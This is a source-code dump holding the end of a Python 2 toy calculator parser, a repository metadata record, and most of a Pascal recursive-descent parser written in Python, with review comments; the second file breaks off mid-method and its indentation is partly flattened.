    # <bitxor_expr> : <bitand_expr> {^ <bitand_expr>}
    #
    def _bitxor_expr(self):
        """ Parse a left-associative chain of '^' operators. """
        lval = self._bitand_expr()
        while self.cur_token.type == '^':
            self._match('^')
            lval ^= self._bitand_expr()
        return lval

    # <bitand_expr> : <shift_expr> {& <shift_expr>}
    #
    def _bitand_expr(self):
        """ Parse a left-associative chain of '&' operators. """
        lval = self._shift_expr()
        while self.cur_token.type == '&':
            self._match('&')
            lval &= self._shift_expr()
        return lval

    # <shift_expr> : <arith_expr> {<< <arith_expr>}
    #              | <arith_expr> {>> <arith_expr>}
    #
    def _shift_expr(self):
        """ Parse a left-associative chain of shift operators. """
        lval = self._arith_expr()
        while self.cur_token.type in ('>>', '<<'):
            if self.cur_token.type == '>>':
                self._match('>>')
                lval >>= self._arith_expr()
            else:
                self._match('<<')
                lval <<= self._arith_expr()
        return lval

    # <arith_expr> : <term> {+ <term>}
    #              | <term> {- <term>}
    #
    def _arith_expr(self):
        """ Parse a left-associative chain of '+'/'-' operators. """
        lval = self._term()
        while self.cur_token.type in ('+', '-'):
            if self.cur_token.type == '+':
                self._match('+')
                lval += self._term()
            else:
                self._match('-')
                lval -= self._term()
        return lval

    # <term> : <power> {* <power>}
    #        | <power> {/ <power>}
    #
    def _term(self):
        """ Parse a left-associative chain of '*'/'/' operators. """
        lval = self._power()
        while self.cur_token.type in ('/', '*'):
            if self.cur_token.type == '*':
                self._match('*')
                lval *= self._power()
            else:
                self._match('/')
                # Floor division keeps results integral: this is an
                # integer calculator, and true division would yield
                # floats under Python 3 (Python 2's int '/' floors
                # anyway, so behavior is unchanged there).
                lval //= self._power()
        return lval

    # <power> : <factor> ** <power>
    #         | <factor>
    #
    def _power(self):
        """ Parse an exponentiation chain. The recursion into
            _power expresses the right-associativity of '**'
            naturally.
        """
        lval = self._factor()
        if self.cur_token.type == '**':
            self._match('**')
            lval **= self._power()
        return lval

    # <factor> : <id>
    #          | <number>
    #          | - <factor>
    #          | ( <cmp_expr> )
    #
    def _factor(self):
        """ Parse a factor: a literal, a variable reference, a
            unary minus, or a parenthesized expression.
        """
        if self.cur_token.type == '(':
            self._match('(')
            val = self._cmp_expr()
            self._match(')')
            return val
        elif self.cur_token.type == 'NUMBER':
            return int(self._match('NUMBER'))
        elif self.cur_token.type == '-':
            self._match('-')
            return -(self._factor())
        elif self.cur_token.type == 'IDENTIFIER':
            id_name = self._match('IDENTIFIER')
            # When syntax checking, we don't care if the variable
            # was defined prior to use.
            if self.only_syntax_check:
                return 0
            try:
                val = self.var_table[id_name]
            except KeyError:
                self._error('Unknown identifier `%s`' % id_name)
            return val
        else:
            self._error('Invalid factor `%s`' % self.cur_token.val)
def calculator_prompt():
    """ A toy calculator prompt for interactive computations.
    """
    # NOTE: Python 2 only (print statement, raw_input).
    print 'Welcome to the calculator. Press Ctrl+C to exit.'
    cp = CalcParser()
    try:
        while True:
            try:
                line = raw_input('--> ')
                print cp.calc(line)
            except ParseError, err:
                # Report the error and keep the prompt alive.
                print 'Error:', err
    except KeyboardInterrupt:
        # Ctrl+C is the normal way to leave the prompt.
        print '... Thanks for using the calculator.'
if __name__ == '__main__':
    import sys
    # With '-p', run the interactive prompt instead of the self-test.
    if len(sys.argv) > 1 and sys.argv[1] == '-p':
        calculator_prompt()
        sys.exit()
    p = CalcParser()
    #
    # If stuff works correctly, this will print 42
    #
    # NOTE(review): '-' is left-associative, so 4 - 5 - 1 evaluates
    # to -2, not 0 as the annotation below claims — confirm intent.
    p.calc('set joe = 4 - 5 - 1') # 0
    print p.calc('joe')
    #~ p.calc('set mar = joe + 2 ** 4 * -3') # -48
    #~ p.calc('set pie = 2 ** 3 ** 2') # 512
    #~ p.calc('if joe != 0 then set pie = 3') # pie stays 512
    #~ p.calc('if 1 == 1 then set k = 10 else set k = 20') # 10
    #~ p.calc('if k > 20 then set k = 12') # k stays 10
    #~ p.calc('if k <= 11 then set t = 0 else set t = 2') # 0
    #~ print p.calc('pie - (k * -mar) + k + t') # 42
| {
"repo_name": "bowlofstew/code-for-blog",
"path": "2009/py_rd_parser_example/rd_parser_ebnf.py",
"copies": "12",
"size": "14356",
"license": "unlicense",
"hash": -3741586921305043500,
"line_mean": 29.3820960699,
"line_max": 68,
"alpha_frac": 0.4286012817,
"autogenerated": false,
"ratio": 3.8852503382949934,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 1,
"avg_score": null,
"num_lines": null
} |
""" A recursive descent pascal parser. """
import logging
from ...common import CompilerError
from ..tools.recursivedescent import RecursiveDescentParser
from .nodes import expressions, statements, symbols, types
from .symbol_table import Scope
class Parser(RecursiveDescentParser):
""" Parses pascal into ast-nodes """
logger = logging.getLogger("pascal.parser")
def __init__(self, diag):
    """ Create a pascal parser reporting diagnostics to `diag`. """
    super().__init__()
    # No module or scope is active until parse_source() runs.
    self.mod = None
    self.current_scope = None
    self.diag = diag
def parse_source(self, tokens, context):
    """ Parse a module from tokens.

    Caches the built-in types from `context`, parses a whole
    program, registers it with the context and returns it.
    A CompilerError is recorded in the diagnostics and re-raised.
    """
    self.logger.debug("Parsing source")
    self.context = context
    self.init_lexer(tokens)
    # Cache frequently used built-in types for quick access.
    self._integer_type = context.get_type("integer")
    self._boolean_type = context.get_type("boolean")
    self._real_type = context.get_type("real")
    self._char_type = context.get_type("char")
    self._string_type = context.get_type("string")
    self.current_scope = context.root_scope
    try:
        program = self.parse_program(context)
    except CompilerError as ex:
        # Record the diagnostic before propagating the failure.
        self.diag.add_diag(ex)
        raise
    self.logger.debug("Parsing complete")
    context.add_program(program)
    return program
def add_symbol(self, sym):
    """ Register *sym* in the current scope; error on redefinition. """
    already_defined = self.current_scope.has_symbol(
        sym.name, include_parent=False
    )
    if already_defined:
        self.error(
            "Redefinition of {0}".format(sym.name), loc=sym.location
        )
    else:
        self.current_scope.add_symbol(sym)
def has_local_symbol(self, name: str) -> bool:
    """ True when *name* is defined directly in the current scope. """
    scope = self.current_scope
    return scope.has_symbol(name, include_parent=False)
def lookup_symbol(self, name: str):
    """ Resolve *name* along the scope chain; KeyError when absent. """
    if not self.current_scope.has_symbol(name):
        raise KeyError(name)
    return self.current_scope.get_symbol(name)
def enter_scope(self):
    """ Open a new lexical scope nested in the current one. """
    self.current_scope = Scope(self.current_scope)
    return self.current_scope
def leave_scope(self):
    """ Pop back to the enclosing lexical scope. """
    parent = self.current_scope.parent
    self.current_scope = parent
def parse_program(self, context):
    """ Parse a program """
    self.consume("program")
    name = self.consume("ID")
    # Optional program parameter list: program name(input, output);
    if self.has_consumed("("):
        args = []
        args.append(self.consume("ID"))
        while self.has_consumed(","):
            args.append(self.consume("ID"))
        self.consume(")")
        # print("TODO", args)
        # TODO: use args for ??
    self.consume(";")
    self.logger.debug("Parsing program %s", name.val)
    # The program gets its own scope for all global declarations:
    scope = self.enter_scope()
    program = symbols.Program(name.val, scope, name.loc)
    # The main block: declarations followed by a compound statement.
    main_code = self.parse_block()
    program.main_code = main_code
    self.consume(".")
    self.consume("EOF")
    return program
def parse_block(self):
    """ Parse a block.
    A block being constants, types, variables and statements.
    """
    # Parse labels:
    if self.has_consumed("label"):
        labels = []
        label = self.consume("NUMBER")
        labels.append(label)
        while self.has_consumed(","):
            label = self.consume("NUMBER")
            labels.append(label)
        self.consume(";")
        # NOTE(review): declared labels are collected but never stored;
        # goto targets are not validated against them — TODO confirm
        # whether that is intentional.
    # Handle a toplevel construct
    if self.peek == "const":
        self.parse_constant_definitions()
    if self.peek == "type":
        self.parse_type_definitions()
    if self.peek == "var":
        self.parse_variable_declarations()
    if self.peek == "procedure" or self.peek == "function":
        self.parse_function_declarations()
    return self.parse_compound_statement()
def parse_constant_definitions(self):
    """ Parse a 'const' section: a sequence of "ID = expr ;" items. """
    self.consume("const")
    while self.peek == "ID":
        name = self.consume("ID")
        self.consume("=")
        value = self.parse_expression()
        self.consume(";")
        # TODO: evaluate expression?
        # This might not be needed, we can evaluate later on?
        symbol = symbols.Constant(name.val, value.typ, value, name.loc)
        self.add_symbol(symbol)
# def eval_const_expr(self, expr):
# """ Evaluate constant expression. """
# pass
def parse_uses(self):
    """ Parse import construct """
    self.consume("uses")
    # NOTE(review): the module name is consumed but discarded; imports
    # are not registered anywhere (see the commented-out line below).
    self.consume("ID").val
    # self.mod.imports.append(name)
    self.consume(";")
def parse_designator(self):
    """ A designator names an object; resolve it in the scope chain. """
    name = self.consume("ID")
    # Look it up!
    if self.current_scope.has_symbol(name.val):
        return self.current_scope.get_symbol(name.val), name.loc
    self.error("Unknown identifier {}".format(name.val), name.loc)
def parse_id_sequence(self):
    """ Parse one or more identifiers separated by ','.

    Consistency: reuse the generic parse_one_or_more helper, exactly
    like parse_expression_list does, instead of hand-rolling the loop.
    """
    return self.parse_one_or_more(self.parse_id, ",")
def parse_id(self):
    """ Consume and return a single identifier token. """
    token = self.consume("ID")
    return token
# Type system
def parse_type_spec(self, packed=False):
    """ Parse type specification.
    This can be any type, from record to ordinal or boolean.

    packed: set when a preceding 'packed' keyword was already consumed.
    """
    # Parse the first part of a type spec:
    if self.peek == "record":
        typ = self.parse_record_type_definition(packed)
    elif self.peek == "packed":
        location = self.consume("packed").loc
        if packed:
            self.error("Duplicate packed indicator", loc=location)
        else:
            typ = self.parse_type_spec(packed=True)
    elif self.peek == "array":
        typ = self.parse_array_type_definition(packed)
    elif self.peek == "set":
        typ = self.parse_set_type_definition(packed)
    elif self.peek == "file":
        # BUG FIX: take the source location from the token (.loc), as
        # every other branch does; previously the whole token object was
        # passed to types.FileType as the location.
        location = self.consume("file").loc
        self.consume("of")
        component_type = self.parse_type_spec()
        typ = types.FileType(component_type, location)
    elif self.peek == "(":
        typ = self.parse_enum_type_definition()
    elif self.peek == "@" or self.peek == "^":
        # Pointer!
        # TODO: move this to lexer?
        if self.peek == "@":
            location = self.consume("@").loc
        else:
            location = self.consume("^").loc
        pointed_type = self.parse_type_spec()
        # NOTE(review): PointerType takes no location here — confirm
        # against its constructor signature.
        typ = types.PointerType(pointed_type)
    else:
        typ = self.parse_ordinal_type()
    return typ
def parse_record_type_definition(self, packed):
    """ Parse a 'record ... end' type description. """
    location = self.consume("record").loc
    field_list = self.parse_record_type_definition_field_list()
    self.consume("end")
    return types.RecordType(field_list, location)
def parse_record_type_definition_field_list(self):
    """ Parse the field list of a record: an optional fixed part
    followed by an optional variant ('case .. of') part.

    Cleanup: removed the dead 'variant = None' assignment — the
    variable was never read after the if/else.
    """
    if self.peek == "ID":
        fields = self.parse_record_fixed_list()
        # An optional variant part may follow the fixed fields:
        if self.peek == "case":
            fields.append(self.parse_record_variant())
    elif self.peek == "case":
        fields = [self.parse_record_variant()]
    else:
        fields = []
    return fields
def parse_record_fixed_list(self):
    """ Parse fixed parts of a record type definition. """
    fields = []
    # Fixed fields part: each entry is 'id, id, ... : type'
    while self.peek == "ID":
        identifiers = self.parse_id_sequence()
        self.consume(":")
        field_typ = self.parse_type_spec()
        # One RecordField per identifier, all sharing the same type:
        for identifier in identifiers:
            fields.append(
                types.RecordField(
                    identifier.val, field_typ, identifier.loc
                )
            )
        # Loop until no more ';' found
        if self.peek == ";":
            self.consume(";")
        else:
            break
    return fields
def parse_record_variant(self):
    """ Parse case .. of part. """
    location = self.consume("case").loc
    # Tag field is optional: 'case tag : type of' versus 'case type of'.
    # NOTE(review): when the tag type itself is a plain identifier
    # ('case color of'), this branch consumes it as a tag field and then
    # demands ':' — verify this against the intended grammar.
    if self.peek == "ID":
        tag_field = self.consume("ID").val
        self.consume(":")
    else:
        tag_field = None
    tag_type = self.parse_type_spec()
    self.consume("of")
    variants = []
    while True:
        # Each variant: 'value, ... : ( field-list )'
        variant_values = self.parse_expression_list()
        self.consume(":")
        self.consume("(")
        variant_fields = self.parse_record_type_definition_field_list()
        self.consume(")")
        variants.append((variant_values, variant_fields))
        if self.peek == ";":
            self.consume(";")
        else:
            break
    variant = types.RecordVariant(tag_field, tag_type, variants, location)
    return variant
def parse_array_type_definition(self, packed):
    """ Parse 'array [ <ordinal>, ... ] of <element-type>'. """
    location = self.consume("array").loc
    if self.has_consumed("["):
        array_dimensions = self.parse_one_or_more(self.parse_ordinal_type, ',')
        self.consume("]")
    else:
        # error() is expected to raise, so the use of the otherwise
        # unbound 'array_dimensions' below is never reached.
        self.error("Expected array size definition")
    self.consume("of")
    array_element_type = self.parse_type_spec()
    typ = types.ArrayType(
        array_element_type, array_dimensions, packed, location
    )
    return typ
def parse_set_type_definition(self, packed):
    """ Parse 'set of <element-type>'.

    BUG FIX: take the source location from the token (.loc); previously
    the whole token object was passed to types.SetType as the location
    (compare the set-literal case in parse_primary_expression, which
    passes a .loc).
    """
    location = self.consume("set").loc
    self.consume("of")
    set_type = self.parse_type_spec()
    typ = types.SetType(set_type, location)
    return typ
def parse_ordinal_type(self):
    """ Parse an ordinal type: a named type or a subrange 'lo .. hi'. """
    if self.peek == "ID":
        # The type is identified by an identifier:
        symbol, location = self.parse_designator()
        if isinstance(symbol, symbols.DefinedType):
            typ = symbol.typ
        else:
            # Not a type name: treat the symbol as the lower bound of
            # a subrange (e.g. a constant or enum value).
            lower_bound = symbol
            self.consume("..")
            upper_bound = self.parse_expression()
            typ = types.SubRange(lower_bound, upper_bound, location)
    else:
        lower_bound = self.parse_expression()
        location = self.consume("..").loc
        upper_bound = self.parse_expression()
        typ = types.SubRange(lower_bound, upper_bound, location)
    return typ
def parse_enum_type_definition(self):
    """ Parse enumerated type definition.
    This looks like:
    colors = (red, green, blue)
    """
    location = self.consume("(").loc
    identifiers = self.parse_id_sequence()
    self.consume(")")
    values = []
    # 'values' is intentionally shared with the EnumType and filled in
    # below, so the type and its member symbols reference each other.
    typ = types.EnumType(values, location)
    for value, identifier in enumerate(identifiers):
        enum_value = symbols.EnumValue(
            identifier.val, typ, value, identifier.loc
        )
        self.add_symbol(enum_value)
        values.append(enum_value)
    return typ
def parse_type_definitions(self):
    """ Parse a 'type' section: a sequence of "ID = type-spec ;". """
    self.consume("type")
    while self.peek == "ID":
        name = self.consume("ID")
        self.consume("=")
        spec = self.parse_type_spec()
        self.consume(";")
        definition = symbols.DefinedType(name.val, spec, name.loc)
        self.add_symbol(definition)
def parse_variable_declarations(self):
    """ Parse a 'var' section; returns all declared variables. """
    self.consume("var")
    # At least one declaration line is required:
    variables = list(self.parse_single_variable_declaration())
    while self.peek == "ID":
        variables.extend(self.parse_single_variable_declaration())
    return variables
def parse_single_variable_declaration(self):
    """ Parse a single variable declaration line ending in ';' """
    names = self.parse_id_sequence()
    self.consume(":")
    declared_type = self.parse_type_spec()
    # Optional initial value:
    initial = self.parse_expression() if self.has_consumed("=") else None
    self.consume(";")
    # Create one Variable symbol per declared name:
    variables = []
    for name in names:
        variable = symbols.Variable(
            name.val, declared_type, initial, name.loc
        )
        variables.append(variable)
        self.add_symbol(variable)
    return variables
def parse_function_declarations(self):
    """ Parse all upcoming function / procedure definitions """
    while self.peek in ("function", "procedure"):
        self.parse_function_def()
def parse_function_def(self):
    """ Parse function definition.

    Handles forward declarations: when the name already exists in the
    local scope it must be a forward-declared subroutine of the same
    kind, and only its body is parsed here.
    """
    if self.peek == "function":
        location = self.consume("function").loc
        is_function = True
    else:
        location = self.consume("procedure").loc
        is_function = False
    subroutine_name = self.consume("ID").val
    self.logger.debug("Parsing subroutine %s", subroutine_name)
    if self.has_local_symbol(subroutine_name):
        # Second occurrence of the name: must be the body belonging to
        # an earlier 'forward' declaration.
        subroutine = self.lookup_symbol(subroutine_name)
        if is_function:
            if not isinstance(subroutine, symbols.Function):
                self.error(
                    "Expected a forward declared function", loc=location
                )
        else:
            if not isinstance(subroutine, symbols.Procedure):
                self.error(
                    "Expected a forward declared procedure", loc=location
                )
        # Swap into the scope created at the forward declaration,
        # parse the body, then restore the previous scope:
        self.current_scope, backup_scope = (
            subroutine.inner_scope,
            self.current_scope,
        )
        self.consume(";")
        subroutine.code = self.parse_block()
        self.consume(";")
        self.current_scope = backup_scope
    else:
        if is_function:
            subroutine = symbols.Function(subroutine_name, location)
        else:
            subroutine = symbols.Procedure(subroutine_name, location)
        # Register the name in the enclosing scope, then open the
        # subroutine's own scope for parameters and locals:
        self.add_symbol(subroutine)
        subroutine.inner_scope = self.enter_scope()
        if self.peek == "(":
            parameters = self.parse_formal_parameter_list()
            for parameter in parameters:
                self.add_symbol(parameter)
            parameter_types = [p.typ for p in parameters]
        else:
            parameters = None
            parameter_types = []
        subroutine.parameters = parameters
        if is_function:
            # Functions carry a return type after ':'
            self.consume(":")
            return_type = self.parse_type_spec()
            subroutine.typ = types.FunctionType(
                parameter_types, return_type
            )
        else:
            subroutine.typ = types.ProcedureType(parameter_types)
        self.consume(";")
        if self.peek == "forward":
            # Body follows later; handled by the branch above.
            self.consume("forward")
        else:
            subroutine.code = self.parse_block()
        self.consume(";")
        self.leave_scope()
    # paramtypes = [p.typ for p in parameters]
    # func.typ = types.FunctionType(paramtypes, returntype)
    # func.parameters = parameters
    # if self.has_consumed(";"):
    #     func.body = None
    # else:
    #     func.body = self.parse_compound()
def parse_formal_parameter_list(self):
    """ Parse format parameters to a subroutine.
    These can be immutable values, variables, or
    function pointers.
    """
    self.consume("(")
    parameters = []
    while True:
        if self.peek == "ID":
            # Value parameters: 'a, b : type'
            identifiers = self.parse_id_sequence()
            self.consume(":")
            typ = self.parse_type_spec()
            for identifier in identifiers:
                parameter = symbols.FormalParameter(
                    identifier.val, typ, identifier.loc
                )
                parameters.append(parameter)
        elif self.peek == "var":
            # NOTE(review): 'var' (by-reference) parameters are parsed
            # exactly like value parameters — the reference-ness is not
            # recorded. TODO confirm this is a known limitation.
            self.consume("var")
            identifiers = self.parse_id_sequence()
            self.consume(":")
            typ = self.parse_type_spec()
            for identifier in identifiers:
                parameter = symbols.FormalParameter(
                    identifier.val, typ, identifier.loc
                )
                parameters.append(parameter)
        elif self.peek == "function":
            # Function-typed parameter with its own parameter list:
            self.consume("function")
            name = self.parse_id()
            parameter_types = [
                p.typ for p in self.parse_formal_parameter_list()
            ]
            self.consume(":")
            return_type = self.parse_type_spec()
            typ = types.FunctionType(parameter_types, return_type)
            parameter = symbols.FormalParameter(name.val, typ, name.loc)
            parameters.append(parameter)
        elif self.peek == "procedure":
            # Procedure-typed parameter; parameter list is optional:
            self.consume("procedure")
            name = self.parse_id()
            if self.peek == "(":
                parameter_types = [
                    p.typ for p in self.parse_formal_parameter_list()
                ]
            else:
                parameter_types = []
            typ = types.ProcedureType(parameter_types)
            parameter = symbols.FormalParameter(name.val, typ, name.loc)
            parameters.append(parameter)
        else:
            self.error("Expected formal parameter!")
        # Parameter groups are separated by ';':
        if not self.has_consumed(";"):
            break
    self.consume(")")
    return parameters
def parse_statement(self) -> statements.Statement:
    """ Determine statement type based on the pending token """
    if self.peek == "if":
        statement = self.parse_if_statement()
    elif self.peek == "while":
        statement = self.parse_while()
    elif self.peek == "repeat":
        statement = self.parse_repeat()
    elif self.peek == "for":
        statement = self.parse_for()
    elif self.peek == "goto":
        statement = self.parse_goto()
    elif self.peek == "case":
        statement = self.parse_case_of()
    elif self.peek == "return":
        statement = self.parse_return()
    elif self.peek == "begin":
        statement = self.parse_compound_statement()
    elif self.peek == "end":
        # Empty statement before 'end' (e.g. 'begin ... ; end'):
        statement = statements.Empty()
    elif self.peek == ";":
        self.consume(";")
        statement = statements.Empty()
    elif self.peek == "with":
        statement = self.parse_with_statement()
    elif self.peek == "ID":
        # Either a procedure call or an assignment, decided by the
        # type of the resolved symbol:
        symbol, location = self.parse_designator()
        if isinstance(symbol.typ, types.ProcedureType):
            statement = self.parse_procedure_call(symbol, location)
        else: # self.peek == ':=':
            statement = self.parse_assignment(symbol, location)
        # else:
        # self.error('Expected assignment or procedure call', loc=location)
    elif self.peek == "NUMBER":
        # label!
        label = self.consume("NUMBER")
        self.consume(":")
        labeled_statement = self.parse_statement()
        statement = statements.Label(
            label.val, labeled_statement, label.loc
        )
    else:
        self.error("Expected statement here")
    return statement
def parse_procedure_call(self, symbol, location):
    """ Procedure call.
    This can be either a builtin procedure, or a user
    defined procedure. Builtin procedure are somewhat magical
    in that they are sort-of-macro-expanded at compile time.
    """
    if isinstance(symbol, symbols.BuiltIn):
        return self.parse_builtin_procedure_call(symbol.name, location)
    if self.peek == "(":
        arguments = self.parse_actual_parameter_list(
            symbol.typ.parameter_types
        )
    else:
        # Parameterless call without parentheses:
        arguments = []
    return statements.ProcedureCall(symbol, arguments, location)
def parse_builtin_procedure_call(self, func: str, location):
    """ Do sort of macro expansion of built-in procedure call.

    Returns a BuiltinProcedureCall wrapping a list of
    (runtime-function-name, [args]) call tuples.
    """
    if func in ["write", "writeln"]:
        # Argument list is optional for write/writeln:
        if self.peek == "(":
            self.consume("(")
            calls = self.parse_one_or_more(self.parse_write_arg, ",")
            self.consume(")")
        else:
            calls = []
        if func == "writeln":
            # writeln appends a newline after the arguments:
            newline = expressions.Literal("\n", self._char_type, location)
            calls.append(("io_print_char", [newline]))
    elif func in ["read", "readln"]:
        if self.peek == "(":
            self.consume("(")
            var = self.parse_expression()
            # Optional leading file argument: read(f, x)
            if var.typ.is_file and self.peek == ",":
                self.consume(",")
                var = self.parse_expression()
            self.consume(")")
            # TODO!
            calls = []
        else:
            # TODO!
            calls = []
    elif func == "put":
        self.consume("(")
        var = self.parse_expression()
        self.consume(")")
        char = self.do_coerce(var, self._char_type)
        calls = [("io_print_char", [char])]
    elif func in ["rewrite", "reset", "get"]:
        self.consume("(")
        var = self.parse_expression()
        self.consume(")")
        self.logger.error("Implement me!")
        # TODO!
        calls = []
    elif func == "new":
        self.consume("(")
        var = self.parse_expression()
        self.consume(")")
        # TODO!
        calls = []
    elif func == "dispose":
        self.consume("(")
        var = self.parse_expression()
        self.consume(")")
        # TODO!
        calls = []
    elif func == "pack":
        self.consume("(")
        var = self.parse_expression()
        self.consume(",")
        var = self.parse_expression()
        self.consume(",")
        var = self.parse_expression()
        self.consume(")")
        # TODO!
        calls = []
    elif func == "unpack":
        self.consume("(")
        var = self.parse_expression()
        self.consume(",")
        var = self.parse_expression()
        self.consume(",")
        var = self.parse_expression()
        self.consume(")")
        # TODO!
        calls = []
    else: # pragma: no cover
        self.not_impl(func)
    return statements.BuiltinProcedureCall(calls, location)
def parse_write_arg(self):
    """ Parse a single write/writeln argument with an optional
    ':width[:frac]' formatting suffix.

    Returns a (runtime-function-name, [args]) tuple, or None when
    printing this type is not implemented yet.
    """
    arg = self.parse_expression()
    if self.has_consumed(":"):
        # Only allowed with writeln and friends.
        field_width = self.parse_expression()
        if self.has_consumed(":"):
            # NOTE(review): 'frac_digits' is parsed but never used
            # below — fractional formatting for reals is unimplemented.
            frac_digits = self.parse_expression()
    else:
        # Assume 10 digits field width with integer values
        # 20 with real values.
        field_width = expressions.Literal(10, self._integer_type, None)
    if self.context.equal_types(self._string_type, arg.typ):
        call = ("io_print", [arg])
    elif arg.typ.is_array and self.context.equal_types(
        "char", arg.typ.element_type
    ):
        # TODO: how to handle strings?
        call = ("io_print", [arg])
    elif arg.typ.is_enum:
        # arg = self.do_coerce(arg, self._integer_type)
        # call = ("io_print_int", [arg])
        # TODO: how is an enum printed?
        call = None
    elif self.context.equal_types("char", arg.typ):
        call = ("io_print_char", [arg])
    elif arg.typ.is_file:
        # TODO!
        call = None
    else:
        # Default to integer:
        arg = self.do_coerce(arg, self._integer_type)
        base = expressions.Literal(10, self._integer_type, None)
        call = ("write_int", [arg, base, field_width])
        # self.error(
        #     "Expected string, integer or char, got {}".format(arg.typ),
        #     arg.location,
        # )
    return call
def parse_assignment(self, symbol, location):
    """ Parse '<variable-access> := <expression>'. """
    target = self.parse_variable_access(symbol, location)
    assign_loc = self.consume(":=").loc
    value = self.parse_expression()
    return statements.Assignment(target, value, assign_loc)
def parse_if_statement(self):
    """ Parse 'if <cond> then <stmt> [else <stmt>]'. """
    location = self.consume("if").loc
    condition = self.parse_condition()
    self.consume("then")
    true_code = self.parse_statement()
    # A missing else branch becomes an empty statement:
    false_code = (
        self.parse_statement()
        if self.has_consumed("else")
        else statements.Empty()
    )
    return statements.If(condition, true_code, false_code, location)
def parse_case_of(self) -> statements.CaseOf:
    """ Parse case-of statement """
    location = self.consume("case").loc
    expression = self.parse_expression()
    tha_type = expression.typ
    if not isinstance(tha_type, types.IntegerType):
        self.error(
            "Expected integer type in case-of statement",
            loc=expression.location,
        )
    self.consume("of")
    options = []
    # Each option is 'value, ... : statement':
    while self.peek not in ["end", "else"]:
        values = [
            self.do_coerce(e, tha_type)
            for e in self.parse_expression_list()
        ]
        self.consume(":")
        statement = self.parse_statement()
        options.append((values, statement))
        if self.peek == ";":
            self.consume(";")
        else:
            break
    # Optional else clause:
    if self.peek == "else":
        self.consume("else")
        default_statement = self.parse_statement()
        self.consume(";")
        # The string "else" is the sentinel marking the default option:
        options.append(("else", default_statement))
    self.consume("end")
    return statements.CaseOf(expression, options, location)
def parse_while(self) -> statements.While:
    """ Parse 'while <condition> do <statement>'. """
    location = self.consume("while").loc
    condition = self.parse_condition()
    self.consume("do")
    body = self.parse_statement()
    return statements.While(condition, body, location)
def parse_repeat(self):
    """ Parse 'repeat <statements> until <condition>'. """
    location = self.consume("repeat").loc
    body = []
    # Statements up to 'until', separated by ';':
    while self.peek != "until":
        body.append(self.parse_statement())
        if not self.has_consumed(";"):
            break
    code = statements.Compound(body, location)
    self.consume("until")
    condition = self.parse_condition()
    return statements.Repeat(code, condition, location)
def parse_for(self) -> statements.For:
    """ Parse 'for <var> := <start> (to|downto) <stop> do <stmt>'. """
    location = self.consume("for").loc
    loop_var, var_loc = self.parse_designator()
    # Robustness: report a proper diagnostic instead of the previous
    # bare 'assert', which is stripped under 'python -O' and otherwise
    # crashes the parser with an AssertionError.
    if not isinstance(loop_var, symbols.Variable):
        self.error("Expected a variable as loop variable", loc=var_loc)
    self.consume(":=")
    start = self.parse_expression()
    if self.peek == "to":
        self.consume("to")
        up = True
    else:
        self.consume("downto")
        up = False
    stop = self.parse_expression()
    self.consume("do")
    statement = self.parse_statement()
    return statements.For(loop_var, start, up, stop, statement, location)
def parse_with_statement(self):
    """ Parse 'with <record-var>, ... do <statement>'.

    Each record variable opens one scope (inside
    parse_single_with_variable); those scopes are popped here after
    the inner statement has been parsed.
    """
    location = self.consume("with").loc
    record_variables = self.parse_one_or_more(
        self.parse_single_with_variable, ","
    )
    self.consume("do")
    inner_statement = self.parse_statement()
    # Close one scope per record variable, innermost first:
    for _ in record_variables:
        self.leave_scope()
    return statements.With(record_variables, inner_statement, location)
def parse_single_with_variable(self):
    """ Parse a single with statement variable.

    Opens a new scope populated with proxies for the record's fields;
    the caller (parse_with_statement) is responsible for popping it.
    """
    record_ref = self.parse_variable()
    if not record_ref.typ.is_record:
        self.error(
            "Expected variable of record type", loc=record_ref.location,
        )
    # Enter new scope:
    self.enter_scope()
    # Enhance scope with record field names:
    for field in record_ref.typ.fields:
        field_proxy = symbols.RecordFieldProxy(
            field.name, field.typ, record_ref.location
        )
        self.add_symbol(field_proxy)
    return record_ref
def parse_goto(self):
    """ Parse 'goto <label-expression>'. """
    location = self.consume("goto").loc
    target = self.parse_expression()
    return statements.Goto(target, location)
def parse_actual_parameter_list(self, parameter_types):
    """ Parse '( expr, ... )', check the argument count against
    *parameter_types* and coerce each argument to its parameter type.

    Cleanup: renamed the local from 'expressions' to 'arguments' — it
    shadowed the imported '.nodes.expressions' module inside this
    method.
    """
    location = self.consume("(").loc
    arguments = self.parse_expression_list()
    self.consume(")")
    if len(arguments) != len(parameter_types):
        self.error(
            "Expected {} parameters, got {}".format(
                len(parameter_types), len(arguments)
            ),
            loc=location,
        )
    return [
        self.do_coerce(e, t) for e, t in zip(arguments, parameter_types)
    ]
def parse_return(self) -> statements.Return:
    """ Parse a return statement """
    location = self.consume("return").loc
    # A bare 'return;' has no value expression:
    if self.has_consumed(";"):
        return statements.Return(None, location)
    value = self.parse_expression()
    self.consume(";")
    return statements.Return(value, location)
def parse_compound_statement(self):
    """ Parse 'begin <stmt> ; ... end'. """
    location = self.consume("begin").loc
    body = self.parse_one_or_more(self.parse_statement, ";")
    self.consume("end")
    return statements.Compound(body, location)
def parse_variable(self):
    """ Parse access to a variable with eventual accessor suffixes. """
    symbol, location = self.parse_designator()
    access = self.parse_variable_access(symbol, location)
    return access
def parse_variable_access(self, symbol, location):
    """ Process any trailing variable access.

    Handles the suffixes '[index, ...]' (array indexing), '.field'
    (record member) and '^' (pointer dereference), in any combination.
    """
    if not isinstance(
        symbol,
        (
            symbols.Variable,
            symbols.Constant,
            symbols.EnumValue,
            symbols.Function,
            symbols.Procedure,
            symbols.RecordFieldProxy,
        ),
    ):
        self.error(
            "Expected a variable here, got: {}".format(symbol),
            loc=location,
        )
    lhs = expressions.VariableAccess(symbol, location)
    while self.peek in ["[", ".", "^"]:
        if self.peek == "[":
            # array indexing
            location = self.consume("[").loc
            indici = self.parse_expression_list()
            self.consume("]")
            for index in indici:
                if not lhs.typ.is_array:
                    self.error(
                        "Expected array type, got: {}".format(lhs.typ),
                        loc=location,
                    )
                array_typ = lhs.typ
                # if len(indici) > len(array_typ.dimensions):
                # self.error('Too many indici ({}) for array dimensions ({})'.format(len(indici), len(array_typ.dimensions)), loc=location)
                # NOTE(review): indexed(1) presumably strips one
                # dimension per index expression — verify against
                # ArrayType.indexed; multi-index bounds checking is
                # still commented out above.
                indexed_typ = array_typ.indexed(1)
                lhs = expressions.Index(
                    lhs, index, indexed_typ, index.location
                )
        elif self.peek == ".":
            # record member access
            location = self.consume(".").loc
            if not lhs.typ.is_record:
                self.error(
                    "Expected record type, got: {}".format(lhs.typ),
                    loc=location,
                )
            field_name = self.parse_id().val
            if lhs.typ.has_field(field_name):
